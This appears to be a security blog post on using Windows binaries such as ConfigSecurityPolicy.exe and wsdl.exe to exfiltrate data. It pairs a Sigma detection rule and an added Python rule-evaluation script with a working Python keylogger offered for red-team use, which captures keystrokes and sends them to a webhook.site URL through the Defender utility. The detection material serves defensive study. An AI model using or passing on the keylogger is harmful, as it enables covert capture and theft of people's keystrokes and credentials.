Data Exfiltration with LOLBins

The term “living off the land” (LOL) was coined by malware researchers Christopher Campbell and Matt Graeber to explain the use of trusted, pre-installed system tools to spread malware. There are a few different types of LOL techniques, including LOLBins, which use Windows binaries to hide malicious activity; LOLLibs, which use libraries; and LOLScripts, which use scripts[1].

You can find a lot of tricks in the LOLBAS project (Living Off The Land Binaries And Scripts, covering LOLBins and LOLScripts): https://github.com/LOLBAS-Project/LOLBAS

My first discovery was a simple way to abuse the Microsoft Windows Defender utility [“C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe”] to exfil data:

ConfigSecurityPolicy.exe

Looking for a little more, I found another way with wsdl.exe (Microsoft Web Services Description Language Utility). The .NET Framework SDK includes the Web Services Description Language tool (Wsdl.exe), which enables you to generate a Web service proxy for use in the .NET Framework development environment. The most common way to create a client proxy in languages that support Web services (currently C# and Microsoft Visual Basic) is to use the WSDL tool [More info]:

wsdl.exe

Blueteam/Redteam tips:

  • UserAgent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.9151)
  • A simple Sigma rule to help detect a possible insider threat:

    logsource:
        product: windows
        category: process_creation
    detection:
        selection:
            Image: '*\ConfigSecurityPolicy.exe'
        mandatory_cmdline:
            CommandLine|all:
                - '*ConfigSecurityPolicy.exe*'
                - '*.xml'
        condition: selection and not mandatory_cmdline

Reference: Hunting for LoLBins
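
The Sigma rule above, evaluated over a few constructed process-creation events, as an added example (not code from the original post or from the Sigma project). The event dicts, the `sigma_match`/`triage`/`hunt` helpers, the URL check and the severity labels are assumptions made for illustration:

```python
import re
from fnmatch import fnmatchcase

# Constructed process-creation events (Sysmon Event ID 1 style fields), not real telemetry.
PLATFORM = r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0"
EXE = PLATFORM + r"\ConfigSecurityPolicy.exe"
EVENTS = [
    {"Image": EXE, "CommandLine": r"ConfigSecurityPolicy.exe C:\temp\policy.xml"},
    {"Image": EXE,
     "CommandLine": r"ConfigSecurityPolicy.exe c:\temp\test.xml https://example.invalid/?abc"},
    {"Image": EXE, "CommandLine": '"' + EXE + r'" "C:\temp\policy.xml"'},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\temp\policy.xml"},
]

# Assumption: an http(s) URL argument is what separates exfiltration from other hits.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def wildcard(value, pattern):
    """Sigma string matching: case-insensitive, '*' is a wildcard, whole value must match."""
    return fnmatchcase(value.lower(), pattern.lower())


def sigma_match(event):
    """The rule's condition: selection and not mandatory_cmdline."""
    selection = wildcard(event["Image"], r"*\ConfigSecurityPolicy.exe")
    mandatory_cmdline = all(
        wildcard(event["CommandLine"], pattern)
        for pattern in ("*ConfigSecurityPolicy.exe*", "*.xml")
    )
    return selection and not mandatory_cmdline


def triage(event):
    """Return None when the rule does not fire, else a finding listing URL arguments."""
    if not sigma_match(event):
        return None
    urls = URL_RE.findall(event["CommandLine"])
    return {"image": event["Image"], "urls": urls,
            "severity": "high" if urls else "medium"}


def hunt(events):
    """Run triage over all events and keep only the findings."""
    return [finding for finding in map(triage, events) if finding is not None]


if __name__ == "__main__":
    for finding in hunt(EVENTS):
        print(finding)
```

The third event shows a caveat of the rule as written: when the last argument is quoted, the command line ends in `.xml"` rather than `.xml`, so the rule also fires on an otherwise ordinary invocation.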

A piece of code to help red team usage (thanks Neriberto Prado ❤), a simple keylogger abusing Windows Defender to exfil logs:

# From: https://github.com/moses-palmer/pynput
from pynput.keyboard import Key, Listener
import os
import sys
import subprocess

URL = 'https://webhook.site/xxxxxx-xxxxx-xxxx-xxxxx-xxxxxxx'
uploader = "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\ConfigSecurityPolicy.exe"
content = ""

def on_press(key):
    global content
    global URL
    global uploader
    if str(key) == 'Key.backspace':
        content += ' '
    else:
        content += str(key)
    print(f'last key: {str(key)}')
    print("")
    if str(key) == 'Key.enter':
        upload_url = (f'{URL}?{content}')
        subprocess.call([uploader, 'c:\\temp\\test.xml', upload_url])
        buffer = ''
    if key == 0x03:
        sys.exit(0)

if __name__ == "__main__":
    try:
        with Listener(on_press=on_press) as listener:
            listener.join()
    except (KeyboardInterrupt, SystemExit):
        sys.exit(0)

Proof of Concept

MITRE ATT&CK Techniques:

  • ID: T1105
  • Sub-techniques: No sub-techniques
  • Tactic: Command And Control
  • Platforms: Linux, Windows, macOS
  • Permissions Required: User
  • Data Sources: File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network

Finally, this is a simple and effective way to simulate possible tactics of your opponents. Soon I will come back with more tips.

movq %rax,%rax
